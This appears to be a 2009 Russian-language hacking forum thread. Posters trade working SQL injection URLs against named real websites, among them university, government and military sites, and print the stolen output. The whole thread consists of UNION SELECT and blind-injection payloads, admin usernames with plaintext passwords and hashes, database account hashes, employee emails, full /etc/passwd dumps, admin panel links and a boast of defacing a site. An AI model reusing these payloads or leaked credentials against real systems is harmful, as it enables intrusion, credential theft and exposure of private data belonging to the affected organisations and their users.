13.02.2009, 18:33

http://www.internationalfellowships.org.uk/host.php?host_id=-1%20union%20select%201,2,3,group_concat(table_name ),5,6,7,8,9%20from%20information_schema.tables--

5.0.67

edichka

13.02.2009, 18:39

http://www.e-travel.ie

http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a3b,version() ,database(),user()),6,7,8,9,0,1

5.0.45-log:;etravelertyu:;etravelusr@localhost

Пассы лимитом

http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a,Admin_Name, Admin_Pass),6,7,8,9,0,1+from+Administrators+limit+ 0,1

Audrey:rUkhf.0RR7tNk

хэш доселе невиданый =)

Логинка

http://www.e-travel.ie/cruise_club_login.php

Gorev

13.02.2009, 19:07

http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,concat_ws(0x3a,version(),d atabase(),user()),4,5,6,7,8,9,10,11+LIMIT+1,1--

Database Version: 5.0.26
Database name: rugby_ro2
User name: root@localhost

читаем

http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,LOAD_FILE(0x2F6574632F7061 73737764),4,5,6,7,8,9,10,11+LIMIT+1,1--

в скуле выводятся бд всех сайтов на хостинге

faza02

13.02.2009, 19:13

http://www.musicer.net/Live%20is%20life.php?sms_kod=-60546'/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

6.0.2-alpha-log
ыыы

f1ng3r

13.02.2009, 19:45

http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11--

Database Version : 4.1.21-standard
Database name : sagu_news
User name : root@192.168.0.2

берем админа:

http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat_ ws(0x3a, user,password),3,4,5,6,7,8,9,10,11+from+mysql.user--

AkyHa_MaTaTa

13.02.2009, 21:19

www.russiatourism.ru PageRank: 6 тИЦ: 1800

http://www.russiatourism.ru/?actionType=getCities&D=-1)+union+select+DISTINCT+concat(table_schema,'.',t able_name,'=%3E',COLUMN_NAME,'%3Cbr%3E')+from+INFO RMATION_SCHEMA.COLUMNS+--+

админку так и не нашел, может ее и нету.

wap.biz.mts.com.ua

http://wap.biz.mts.com.ua/tr/rss-feeder?from=/4&pid=1&nid=-38189'+union+select+1,2,3,concat_ws(0x3A,user(),@@ version,database()),5,6,7,8+--+

rescue01.gov.by

http://rescue01.gov.by/news/show.news.cgi?id=-435+union+select+1,2,3,concat_ws(0x3A,user(),datab ase(),version()),5/*

админка на басике авторизации :( .

spherics

13.02.2009, 21:33

http://www.circlemichigan.com/member.php?id=109777778840/**/uNiOn/**/seLeCt/**/1,2,3,concat_ws(0x3a,version(),user(),database()), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27--

Database Version: 5.0.67-community
Database name: circlem_db
User name: circlem_webuser@localhost

/home/circlem/public_html/manager/obj/database/mysql.php

http://www.circlemichigan.com/member.php?id=109777778840+UNION+SELECT+1,2,3,AES_ DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(id, 0x3a,username,0x3a,hash,0x3a,access)+FROM+circlem_ db.users+LIMIT+5,1),0x3a),0x71),0x71),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7--

: 3 : root : 4c60d3c4867b2f1e6935165b4b68130e24276876 : a : 1 : {s:4:"root";b:1;}

http://www.janera.com/janera_words.php?id=140+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8--

Database Version: 5.0.67-log
Database name: janera
User name: janera@patton.dreamhost.com

http://www.janera.com/janera_words.php?id=140+UNION+SELECT+1,2,AES_DECRY PT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(username ,0x3a,password,0x3a,email)+FROM+janera.nljr_bouser s+LIMIT+3,1),0x3a),0x71),0x71),4,5,6,7,8--

: Janera:janera : publisher@janera.com
: Farrah:Farrah : fsarafa@janera.com
: Hannah:hannah : hwallace@janera.com
: Tusha:Tusha : TYakovleva@JANERA.com
: Erin:Florio : eflorio@janera.com
: Allison DeFrees : Clementine:Adefrees@janera.com

faza02

13.02.2009, 21:54

http://www.macbytes.com/mb.php?catdispid=-12+union+select+1,2,3,version(),5,6,7,8,9/*

5.0.22-log

M.W.N.N.

13.02.2009, 22:23

http://www.innernet.org.il/printArticle.php?id=-197+union+select+1,2,3,4,5,6,version()/*

version() 4.0.16-log
database() innernet
user() innerdb@zeraim

M.W.N.N.

13.02.2009, 22:40

http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(versio n(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18

4.1.21-standard
engel_website
engel_website@localhost

http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(id,0x3 a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+from+engel_users

spherics

13.02.2009, 23:13

PageRank = 7

https://sju.ca/people2.php?id=18098097409809670+union+select+1,2, 3,concat_ws(0x3a,version(),user(),database()),5,6, 7,8,9,10,11,12,13,14,15,16--

Database Version: 5.0.38-Ubuntu_0ubuntu1-log
Database name: sjudb
User name: sjuuser@64.235.105.134

PageRank = 5

http://www.contemporaryposters.com/category.php?Category_ID=3798798698750+union+selec t+concat_ws(0x3a,version(),user(),database())--

4.1.22-standard
dsmayer_dsmayer@localhost
dsmayer_contemporaryposters

https://www2.tpwd.state.tx.us/huntwild/hunt/planning/hunt_lease/details.php?id=68751587468760+union+select+1,2,3,4 ,5,6,7,8,concat_ws(0x3a,version(),user(),database( )),10,11,12,13--

4.1.20-log
huntLeaseDefault@localhost
huntlease

http://www.2007.botanyconference.org/engine/search/index.php?func=detail&aid=1809809709840+union+select+1,concat_ws(0x3a,ve rsion(),user(),database()),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42--

5.0.67-community
scientif@localhost
botany2007

kevmen

13.02.2009, 23:56

http://www.droug.ru/index.php?id=270+and+substring(version(),1,1)=5

version:5

http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),1,1))= 100 == d
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),2,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),3,1))= 111 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),4,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),5,1))= 103 == g
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),6,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),7,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),8,1))= 64 == @
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),9,1))= 49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),10,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),11,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),12,1)) =49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),13,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),14,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),15,1)) =49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),16,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),17,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),18,1)) =50 == 2
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),19,1)) =50 == 2
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),20,1)) =48 == 0

user:drougru@10.10.10.220

http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),1,1))= 100 == d
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),2,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),3,1))= 111 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),4,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),5,1))= 103 == g
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),6,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),7,1))= 117 == u
database:drougru

Parserian

14.02.2009, 01:00

http://www.savatouristik.ru/index.php?id=-1%20UNION%20SELECT%201,%20concat_ws(char(58),%20us er(),%20version(),%20database())%20--

client304@localhost:4.0.27:savatour

pinky07

14.02.2009, 02:28

datasvyazi.ru Качественный хостинг=)))

http://datasvyazi.ru/about/news/?rid=3619'+union+select+1,2,concat_ws(0x3a,user(), version(),database()),4,5,6+--+

юзер - superaza_data@localhost
бд - superaza_data
версия MySQL - 5.0.44-log

http://datasvyazi.ru/about/news/?rid=3619'+union+select+1,2,group_concat(login,0x3 a,pass),4,5,6+from+mb_users+--+

по все видимости логин админа:superaza , а md5 хеш пароля: a1314764bfdb8b9683dcf378520912a4

Parserian

14.02.2009, 03:05

http://www.i4b.ru/link2.php?id=1%20union%20select%20group_concat(con cat_ws(char(58),%20id,pass,nick)%20SEPARATOR%200x3 C62723E)%20from%20smerus_users%20limit%201

f1ng3r

14.02.2009, 03:16

http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat_ ws(0x3a,version (),database(),user()),4,5,6--

Database Version : 5.0.51a-log
Database name : openbg_mambo1
User name : ropenbg_mambo1@localhost

берем админов:

http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat _ws(0x3a,flogin,f pass),4,5,6+ from+atuser--

выводятся все сразу ))

вот и сама админка :

http://www.open-bg.net/adm /index.php

-------------------------# add

http://ypetev.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version( ),database(),user()),4,5,6--

Database Version : 5.0.67-community-log
Database name : ypetevc_1
User name : ypetevc_1@localhost

Kraneg

14.02.2009, 10:29

uchri.org - PR7
http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT( concat_ws(0x3a,version(),user(),database()),73),73 ),4,5,6,7/*
DB_Ver : 4.1.13-log
DB_User : root@localhost
DB : uchri_website

Выведем пользователей, благо выводятся все и сразу =)
http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT( concat_ws(0x3a,user,password),73),73),4,5,6,7+from +mysql.user/*root:*3E9CBCAC089CD40647357E4F6468CF7A8FCDC6C5
bahacal:*EF6AE544D8B7CC6B225A461C0EB6C8E72DF68ED1
mario:*C0110649C935092BAB4CC0D1897ED4A4680CD3FA
uchri_user:*D639800883740738B468A3FE6FF4D34EE25FD1 5E

Читаем файлы /etc/passwd:
http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT( LOAD_FILE(0x2f6574632f706173737764),73),73),4,5,6, 7/*

Gorev

14.02.2009, 11:16

http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8/*

Database Version: 4.1.22
Database name: consensus
User name: root@localhost

Read File

http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+UNION+SELECT+1,2,3,LOAD_FILE(0x2F6574632F706173 737764),5,6,7,8/*

Kraneg

14.02.2009, 11:25

haas.stanford.edu - PR6
http://haas.stanford.edu/external_fellowships/definition.php?cat_id=10000'+UNION+SELECT+1,concat _ws(0x3a,version(),user(),database()),3,4/*

DB_Ver : 4.1.22
DB_User : haas@localhost
DB : haas

-m0rgan-

14.02.2009, 13:28

www.acd.edu
PR:4
http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,user,password), 4,5+from+mysql.user/*
логин/пасс:
root:45b3d67e3384ad28

http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5+from+mysql.user/*

версия/юзер/бд:

4.1.22:root@localhost:InternalKnowledgeBase

смотрим file_priv:
http://www.acd.edu/news.php?id=-1'+union+select+1,2,file_priv,4,5+from+mysql.user/*

Y

Читает etc/passwd
http://www.acd.edu/news.php?id=-1'+union+select+1,2,load_file('/etc/passwd'),4,5+from+mysql.user/*

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
XXnews:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
XXoperator:x:11:0:operator:/root:/sbin/nologin
XXgames:x:12:100:games:/usr/games:/sbin/nologin
XXgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
XXftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/bin/bash
XXwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mwade:x:500:500::/home/mwade:/bin/bash
rack:x:501:501::/home/rack:/bin/bash
dzo:x:502:502::/home/dzo:/bin/bash
psienkiewicz:x:503:503:Piotr Sienkiewicz:/home/psienkiewicz:/bin/bash
galileoe:x:504:504:Galileo Website:/home/galileoe:/bin/false
matt:x:505:505:Matt Wade:/home/matt:/sbin/nologin
lynn:x:506:506:lynn:/home/lynn:/bin/false
aaron:x:507:507:aaron:/home/galileoe/xdrive/folder/aaron/./:/bin/false
XXtemp:x:509:509:temp:/home/temp:/bin/sh
plastus:x:510:510::/home/plastus/:/bin/sh
xdrive:x:511:511::/home/galileoe/xdrive/:/bin/false
veeroos:x:512:512::/home/veeroos:/bin/sh
gallery:x:513:513::/home/gallery:/bin/sh
Xkamil:x:514:514::/home/kamil:/bin/sh
presentations:x:516:516::/home/galileoe/xdrive/presentations:/bin/sh
rpelletier:x:517:517::/home/rpelletier:/bin/bash
ccarson:x:518:518:Chuck Carson:/home/ccarson:/bin/bash
wwolfe:x:519:519::/home/wwolfe:/bin/bash
apache2:x:102:102:Apache2 Owner:/usr/local/httpd-2.2.6:/bin/false
mysqldev:x:5000:5000:Mysql Dev User:/usr/local/mysql:/sbin/nologin
oracle:x:110:110:Oracle User:/u01/app/oracle/home:/bin/bash

Dimionx

14.02.2009, 15:06

www.rune-soft.com

PR = 4

http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,concat(login,0x3a,password,0x3a,ema il),20,21,22,23+from+user+limit+2,1/*

login:password:email
admin:tagltorp:ivang@mail.com

http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,concat(version(),0x3a,database(),0x 3a,user()),20,21,22,23/*
версия:бд:юзер

5.0.32-Debian_7etch8:runeDB:runeDBuser@localhost

Велемир

14.02.2009, 15:58

http://cms.artmedia.ee/arinou/index.php?leht=149'+union+select+version(),2/*

Версия: 4.1.22-standard
Имя бд: wartmed_walmivad
Юзер: wartmed_wartmed@localhost

Таблицы не подобрал)

http://www.tartu.ee/arinouandla/index.php?leht=219'+union+select+version(),2

Пятая версия.

В бд ничего нету интересного,можете сами проверить таблицы:

kasutajad,kasutajad_back,kasutajad_190607,umail

f1ng3r

14.02.2009, 16:00

http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10--

Database Version : 5.0.32-Debian_7etch4-log
Database name : vraca
User name : vraca@www2.host2bg.com

берем юзверей:

http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat _ws(0x3a,username,user_password),3,4,5,6,7,8,9,10+ from+phpbb _users+limit+1,1--
их ~ 1700

Gorev

15.02.2009, 10:38

http://www.administratordebloc.ro/index.php?action=article&ID=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws( 0x3a,version(),database(),user()),13--

Database Version: 5.0.67-community
Database name: admbl_admbl
User name: admbl@localhost

http://www.administratordebloc.ro/admin

Dimionx

15.02.2009, 12:08

www.whitestrip.ru
Google PR: 5
Yandex CY:130

http://www.whitestrip.ru/news/view/896+union+select+1,2,concat(version(),0x3a,databas e(),user()),4,5,6,7,8,9/*/

Версия: 5.0.67
Юзер: u15581@78.108.81.41
Бд: b15581_wstrip

http://www.whitestrip.ru/news/view/896+union+select+1,2,table_name,4,5,6,7,8,9+from+i nformation_schema.tables/*/

Вывод всех табличек

http://www.whitestrip.ru/news/view/896+union+select+1,2,column_name,4,5,6,7,8,9+from+ information_schema.columns/*/

Вывод всех колонок

Также смотрим на мой мини дефейс)))
www.whitestrip.ru
http://www.whitestrip.ru/pages/dimionx/

http://s48.radikal.ru/i119/0902/a5/43c099b4c155.jpg

DimOnOID

15.02.2009, 12:47

http://www.ruscable.ru/board_el/msg-55533+union+select+1,2,3,4,concat_ws(0x15,user(),v ersion(),database()),6,7,8,9,10,11,12,13,14,15,16. html

spherics

15.02.2009, 13:18

http://infobase.paiz.gov.pl/indexl.php?action=select_nieruch_id&id=771709480980+UNION+SELECT+AES_DECRYPT(AES_ENCRY PT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User (),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32-- &offset=380&zones_id=&voivodship=&area_min=&area_max=

Database Version: 5.0.18-standard
Database name: infobase3
User name: www-data@localhost

http://infobase.paiz.gov.pl/indexl.php?action=select_nieruch_id&id=771709480980+UNION+SELECT+AES_DECRYPT(AES_ENCRY PT(CONCAT(0x3a,password,0x3a,User,0x3a),0x71),0x71 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.us er+limit+0,1--

: 054bea7647c4c9ff : root :
: 027a5ebb761cd005 : mrozek :
: 26978fd16e5c7f8b : www-data :

http://playak.com/kayaks.php?id=587614566876870+union+select+1,2,3,c oncat_ws(0x3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34--

5.0.22-log
playak@localhost
playak rating

http://playak.com/kayaks.php?id=587614566876870+union+select+1,2,3,c oncat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34+from+mysql.user+limit+0,1--

admin:6633c79b2fec1807
pma_aqBG7oMhnKtq:4156e69767be6e91
horde:0e843dda46926377
netpresent:250dbe034105d511
seag:2c07485714a923e2
terrag:765d8db733d31334
rosenberg:1a501a431e40f89f
airsquad:59811f9f5eaf68c3
playak:250dbe034105d511
polls:107b804a16be8687
boatinfo:02f0fcf80f7b4bbc
mambo:70f7ce324f035014
nookie:2aa80ddd11d25b68
fish:4b7be07c38ffcf32
mambo451a:31faef2201fc5b68
kajakvideos:250dbe034105d511
adrian:4bece1e04447a9c9
sugar5:250dbe034105d511

Kraneg

15.02.2009, 13:46

upitup.com - PR5
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,concat_ws(0x3a, version(),user(),database()),3,4,5,6,7,8/*
DB_Ver:4.0.27-standard-log
DB_User:Sql18862@62.149.141.95
DB:Sql18862_1
Таблица с пользователями называется User, интересные поля id,email,username,password
Вытаскиваем одного из админов:
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(concat_ws(0x3a,username,password),73),73) ,3,4,5,6,7,8+from+users+limit+1,1/*

admin:3a21adafbcd3d31a17da15c670615005
или уже расшифрованные
admin : p161c4u
Чтобы попасть в админку логинимся и переходим:
http://www.upitup.com/controlcenter/

f1ng3r

15.02.2009, 14:43

http://www.ultimabg.com/news.php?lang=en&valuta=&id=-1+union+select+concat_ ws(0x3a,version(), database(),user()),2,3,4,5,6--

Database Version : 5.0.67-msl-usrs-icd1-log
Database name : ultimabg_estatemanager
User name : nkemutf5@localhost

----------------------------------------------------#

http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat_ ws(0x3a, version(),database(),user()),3,4,5,6--

Database Version : 5.0.67-log
Database name : bourgas
User name : bourgas@localhost

берем админов:

http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat _ws( 0x3a,id,users,passes),3,4,5,6+from+aeg_accounts+li mit+0,1--

1:volid:551278
2:admin:aeg1234

----------------------------------------------------#

http://www.traditzia.bg/bg/news.php?Id=-1'

инфу о бд не даёт просмотреть ... но за-то смотрим админов:

http://www.traditzia.bg/bg/news.php?Id=-1+union+select+1,concat _ws(0x3a,id,user,pass),3,4,5,6,7+from+ users+limit+0,1--

1:admin:$tradicija
2:tradicia:4tradici@

а тут сама админка:

http://www.traditzia.bg/ admin/

Gorev

15.02.2009, 15:52

http://www.unarte.ro/unarte/newunarteTST/home.php?l=ro&p=noutati&id=-37+UNION+SELECT+CONCAT_WS(0x3a,version(),database( ),user()),2,3,4

Version : 5.0.67-community
Database : unarte_tetenica
User : unarte_siteuna@localhost

f1ng3r

15.02.2009, 16:14

http://www.bfu.bg/news/index.php?url=news-detail.php&id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8--

Database Version : 5.0.67-community-nt
Database name : bfu
User name : web@127.0.0.1

---------------------------------------#

http://www.insurance.bg/news/printnews.php?id=-1+union+select+1,concat_ ws(0x3a,version (),database(),user()),3,4,5,6--

Database Version : 4.0.26-standard-log
Database name :nsurance_main
User name : insurance_local@localhost

смотрим админа:
http://www.insurance.bg/news/printnews.php?id=-1+union+select+1,concat_ ws(0x3a,id,name,pass),3,4,5,6+ from+users--

1:admin:InsNewsTeam2008

админка:

http://www.insurance.bg/ admin/login.php

Требует плагин. Нормально заходит под IE.

faza02

15.02.2009, 17:52

http://madint.ru/do.php?id=-6+union+select+1/*

M.W.N.N.

15.02.2009, 18:18

http://www.credo.md/pagini/masterat.php?limba=rus&id=24%27+union+select+1,concat(version(),0x3a,data base(),0x3a,user()),3,4,5,6+limit+1,1/*

5.0.24a:test01:test01@localhost

http://www.99.md/index.php?type=sales&id=36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33+limit+1,1

version() 5.0.67
user() 99md@localhost
database() 99md_99md

f1ng3r

15.02.2009, 18:23

http://www.artbulgaria.org/news.php?cat=news&id=-1+union+select+1,concat_ ws(0x3a,version(),database( ),user()),3,4,5--

Database Version : 5.0.67-log
Database name : artbulgaria
User name : artbulgaria@localhost

смотрим админа:
http://www.artbulgaria.org/newsid.php?cat=news&=-1+union+select+1,concat_ws(0x3a,id,user_name,user_ password),3,4,5+from+artbulgaria _users+limit+0,1--

-----------------------------------------#

Все Болгария надоела ... перехожу на Италию :p

http://www.iltuffetto.it/news.php?id=4+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5,6--

Database Version : 5.0.51a-log
Database name : 372186_iltuffetto
User name : 372186_iltuffett@172.16.11.71

админ:

http://www.iltuffetto.it/news.php?id=4+union+select+1,2,concat _ws(0x3a,id,username,passsword),4,5,6+from+utenti+ limit+0,1--

3:Andrea:lokos

админка:

http://www.iltuffetto.it/ admin/login.php

M.W.N.N.

15.02.2009, 18:24

http://www.moldovajob.md/showvacancy.php?id=19613/**/union/**/select/**/1,22,23,concaT(version(),0x3a,database(),0x3a,user ()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43/**/limit/**/1,1/*

version() 5.0.45
database() moldovaj_newjoblist
user() moldovaj_alexdio@localhost

http://www.poynting.co.za/pressnews.php?id=-19+union+select+1,2,3,4,5,6+limit+1,1/*

version() 5.0.24-standard
database() poynting
user() poynting@xweb.datapro.co.za

http://www.poynting.co.za/pressnews.php?id=-19+union+select+1,2,3,concat(id,0x3a,username,0x3a ,pass),5,6+from+users+limit+1,1/*

http://www.defenceuganda.mil.ug/details.php?item=-34+union+select+1,2,concaT(version(),0x3a,database (),0x3a,user()),4,5,6+from+users+limit+1,3/*

4.0.27-max-log:defense:defense@64.202.163.193

http://www.defenceuganda.mil.ug/details.php?item=-34+union+select+1,concat(0x3a,id,0x3a,username,0x3 a,password),3,4,5,6+from+users+limit+1,3/*

http://uamp.wits.ac.za/sebs/staff_individual.php?id=239+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,concat(version(),0x3a,database() ,0x3a,user()),14,15,16,17,18,19,20+limit+1,1/*

5.0.45-log:sebs:sebsadmin@localhost
___
http://www.bayworld.co.za/press.php?id=-81+union+select+1,2,3,4,5,6/*

5.0.32-Debian_7etch1-log:bayworld:bayworld@localhost
___
http://www.healthspas.co.za/spa-bookings.php?Id=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/*

5.0.32-Debian_7etch8:healthsp_health:healthspad@localhost

faza02

15.02.2009, 20:23

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16/*

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,table_name,4,5,6,7,8,9,10,11, 12,13,14,15,16+from+information_schema.tables+limi t+85,1/*

gl_users

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,passwd,4,5,6,7,8,9,10,11,12,1 3,14,15,16+from+gl_users+limit+1,1/*

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,username,4,5,6,7,8,9,10,11,12 ,13,14,15,16+from+gl_users+limit+1,1/*

Anonymous:tompika

гг, помогло) (http://forum.antichat.ru/showthread.php?p=1118561#post1118561)

PR 6

R1dex

15.02.2009, 20:37

Обои на рабочий стол.

http://desktopauto.org/unsorted/-38+union+select+1,2,3,version(),5.htm

AkyHa_MaTaTa

15.02.2009, 20:44

www.enwell.net PageRank: 6

http://www.enwell.net/flash/topic.php?topicid=-1+union+select+1,2,3,4,5,concat_ws(0x3A,user(),@@v ersion,database()),7,8,9,10+--+

www.tms-media.co.uk PageRank: 5

http://www.tms-media.co.uk/news/info.php?item=Cairo-office-unveiled&refnum=-76+union+select+1,concat_ws(0x3A,user(),version(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23+--+

Gorev

15.02.2009, 20:47

http://www.fabricademagie.ro/index.php?sectiune=produse&produs=-205+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22--&categ_id=1

Database Version: 4.1.22-standard-log
Database name: fabricad_fabricademagie
User name: fabricad_axiomat@localhost

-m0rgan-

15.02.2009, 21:04

http://sevleshoz.com/news.php?id=-8+union+select+1,2,concat_ws(version(),user(),data base())--
версия/юзер/бд:
sevlesho_leshoz@localhost4.1.22-standardsevlesho_data
---------------------------------------------
The End!

f1ng3r

15.02.2009, 21:06

http://www.enerpoint.it/news/news_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat _ws(0x3a,version(),database(),user( )),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ mysql.user+limit+0,1--

Database Version : 5.0.32-Debian_7etch6-log
Database name : enerpoint
User name : solar@localhost

берем админа :

http://www.enerpoint.it/news/news_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat _ws(0x3a,user,password),10,11,12,13,14,15,16,17,18 ,19,20,21,22,23+from+mysql. user+limit+0,1--

M.W.N.N.

15.02.2009, 21:19

http://www.ci.uchicago.edu/events/detail.php?id=17%27+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16/*
Version 4.0.24
Database clsweb
User clswww@www.ci.uchicago.edu

http://www.sahovski.com/products/ci/latest.php?id=344+union+select+1,2,3,4,5,6,concat( version(),0x3a,database(),0x3a,user()),8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32+limit+1,1/*

5.0.26:sahovski_co_yu_-_sahovski:sahovski@localhost

